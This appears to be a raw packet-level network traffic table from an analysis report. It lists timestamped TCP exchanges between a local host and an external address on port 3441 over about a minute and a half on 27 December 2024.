                                                        Dec 27, 2024 14:56:23.103072882 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:23.103228092 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:23.103360891 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:23.222769976 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:24.443131924 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:24.443326950 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:24.562870026 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:24.855456114 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:24.855586052 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:24.975198984 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:24.976258993 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:25.095741034 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:25.390834093 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:25.391294956 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:25.510799885 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:25.513784885 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:25.633383989 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:25.925731897 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:26.107582092 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:26.136006117 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:26.140650988 CET499983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:26.241394997 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:26.260247946 CET34414999887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:26.260317087 CET499983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:26.261210918 CET499983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:26.380805969 CET34414999887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:26.825119972 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:26.872030020 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:27.546222925 CET34414999887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:27.551712036 CET499983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:27.671295881 CET34414999887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:27.836088896 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:27.950788975 CET34414999887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:27.951508999 CET499993441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:28.002055883 CET499983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:28.002060890 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:28.070951939 CET34414999987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:28.071069002 CET499993441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:28.071209908 CET499993441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:28.190793037 CET34414999987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:28.839747906 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:29.053706884 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:29.308995962 CET34414999987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:29.309993982 CET499993441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:29.429439068 CET34414999987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:29.699868917 CET34414999987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:29.702474117 CET500003441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:29.821940899 CET34415000087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:29.822187901 CET500003441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:29.822187901 CET500003441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:29.853720903 CET499993441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:30.090167046 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:30.097320080 CET34414999987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:30.097368002 CET34415000087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:30.097393990 CET499993441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:30.256345034 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:30.869352102 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:31.053230047 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:31.306008101 CET34415000087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:31.306165934 CET500003441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:31.425688028 CET34415000087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:31.708745003 CET34415000087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:31.709736109 CET500013441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:31.829370975 CET34415000187.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:31.830019951 CET500013441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:31.830188036 CET500013441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:31.837703943 CET500003441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:31.869705915 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:31.949570894 CET34415000187.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:31.959466934 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:32.869568110 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:32.959546089 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:33.121325970 CET34415000187.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:33.124340057 CET500013441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:33.243958950 CET34415000187.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:33.530714035 CET34415000187.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:33.534559965 CET500023441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:33.654037952 CET34415000287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:33.654433012 CET500023441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:33.654581070 CET500023441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:33.725477934 CET500013441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:33.774076939 CET34415000287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:33.870222092 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:33.959489107 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:35.198997021 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:35.199399948 CET34415000287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:35.203576088 CET500023441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:35.309834003 CET34415000287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:35.310081959 CET500023441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:35.323283911 CET34415000287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:35.350111008 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:35.604207993 CET34415000287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:35.740736961 CET500023441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:35.871072054 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:35.980545044 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:36.873444080 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:36.960114002 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:37.873733044 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:37.959496975 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:38.873141050 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:38.961730957 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:39.874109030 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:39.959491014 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:40.874205112 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:40.959738970 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:41.874806881 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:41.959506035 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:42.876853943 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:43.053317070 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:43.876409054 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:43.956655979 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:44.877396107 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:45.053716898 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:45.877168894 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:45.959489107 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:46.878369093 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:46.959543943 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:48.161999941 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:48.306520939 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:48.365844965 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:48.365902901 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:48.878851891 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:48.961719036 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:49.879374027 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:49.959487915 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:50.350008011 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:50.350091934 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:50.879246950 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:51.053725004 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:51.880451918 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:51.959495068 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:52.881108046 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:52.959630013 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:53.881489992 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:53.991487026 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:54.882143021 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:54.959506035 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:55.882066965 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:55.959494114 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:56.913146019 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:56.961697102 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:57.914067030 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:57.959515095 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:58.916155100 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:59.053703070 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:59.917757988 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:59.997543097 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:00.943864107 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:01.165713072 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:01.945051908 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:02.143620968 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:02.945513964 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:03.162791967 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:03.945679903 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:04.077913046 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:04.823724031 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:04.823795080 CET499983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:04.823832989 CET499993441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:04.823890924 CET500003441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:04.824121952 CET500023441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:04.824131012 CET500013441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:04.943479061 CET34414999787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:04.943546057 CET499973441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:04.944278955 CET34414999887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:04.944302082 CET34414999987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:04.944313049 CET34415000087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:04.944327116 CET499983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:04.944339037 CET34415000287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:04.944346905 CET499993441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:04.944369078 CET500003441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:04.944396973 CET500023441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:04.944401026 CET34415000187.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:04.944545984 CET500013441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:08.853142023 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:08.972784996 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:08.976104021 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:08.976104021 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:09.095668077 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:10.317339897 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:10.317625999 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:10.437473059 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:10.731343031 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:10.731548071 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:10.851243019 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:10.851385117 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:10.970933914 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:11.265095949 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:11.265357971 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:11.385092020 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:11.385349989 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:11.504998922 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:11.798816919 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:12.009068966 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:12.009131908 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:12.011661053 CET500043441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:12.131274939 CET34415000487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:12.131373882 CET500043441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:12.131747961 CET500043441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:12.227287054 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:12.251192093 CET34415000487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:12.334485054 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:12.950855970 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:13.037615061 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:13.378233910 CET34415000487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:13.378772020 CET500043441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:13.498202085 CET34415000487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:13.772891045 CET34415000487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:13.774749994 CET500053441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:13.894294024 CET34415000587.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:13.898040056 CET500053441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:13.898040056 CET500053441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:13.929714918 CET500043441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:13.953340054 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:14.017846107 CET34415000587.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:14.037650108 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:14.955020905 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:15.039896011 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:15.141124010 CET34415000587.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:15.147826910 CET500053441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:15.267406940 CET34415000587.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:15.538403034 CET34415000587.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:15.541708946 CET500063441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:15.661216021 CET34415000687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:15.661560059 CET500063441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:15.663781881 CET500063441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:15.727773905 CET500053441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:15.783368111 CET34415000687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:15.962694883 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:16.037648916 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:16.950994968 CET34415000687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:16.951459885 CET500063441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:16.961695910 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:17.070970058 CET34415000687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:17.133723021 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:17.351871014 CET34415000687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:17.363723993 CET500073441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:17.428333998 CET500063441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:17.483551979 CET34415000787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:17.483649015 CET500073441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:17.483886003 CET500073441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:17.603307009 CET34415000787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:17.961000919 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:18.037697077 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:18.791250944 CET34415000787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:18.791510105 CET500073441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:18.911010981 CET34415000787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:18.961971045 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:19.040236950 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:19.194966078 CET34415000787.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:19.201709986 CET500083441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:19.321347952 CET34415000887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:19.321949959 CET500083441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:19.321949959 CET500083441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:19.335433960 CET500073441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:19.442440987 CET34415000887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:19.961698055 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:20.037631035 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:20.672055006 CET34415000887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:20.672377110 CET500083441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:20.791941881 CET34415000887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:20.963958979 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:21.037862062 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:21.084124088 CET34415000887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:21.165707111 CET500083441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:21.963809967 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:22.037687063 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:22.963831902 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:23.040014029 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:23.973814964 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:24.037686110 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:24.965475082 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:25.053280115 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:25.966192007 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:26.037616968 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:26.966099024 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:27.054585934 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:27.972812891 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:28.053284883 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:28.973064899 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:29.037734985 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:29.972930908 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:30.037645102 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:30.976025105 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:31.037730932 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:31.975836039 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:32.037631035 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:32.976434946 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:33.037700891 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:33.978180885 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:34.037688017 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:34.978646994 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:35.037633896 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:35.978104115 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:36.053261995 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:36.978919983 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:37.053425074 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:37.979033947 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:38.037659883 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:38.980658054 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:39.037720919 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:39.981610060 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:40.147016048 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:40.982741117 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:41.053694963 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:41.988609076 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:42.053271055 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:42.986207008 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:43.053379059 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:43.986712933 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:44.053328037 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:44.987401009 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:45.053335905 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:45.987777948 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:46.053248882 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:46.987960100 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:47.037616014 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:47.988534927 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:48.037688017 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:48.989093065 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:49.053648949 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:49.989829063 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:50.037666082 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:50.990097046 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:51.039817095 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:51.990741968 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:52.037609100 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:52.991919994 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:53.037663937 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:53.991713047 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:54.053296089 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:54.992939949 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:55.039356947 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:55.994932890 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:56.037638903 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:56.995856047 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:57.037689924 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:57.994334936 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:58.037672043 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:57:58.994126081 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:57:59.037727118 CET500033441192.168.2.1087.121.86.214
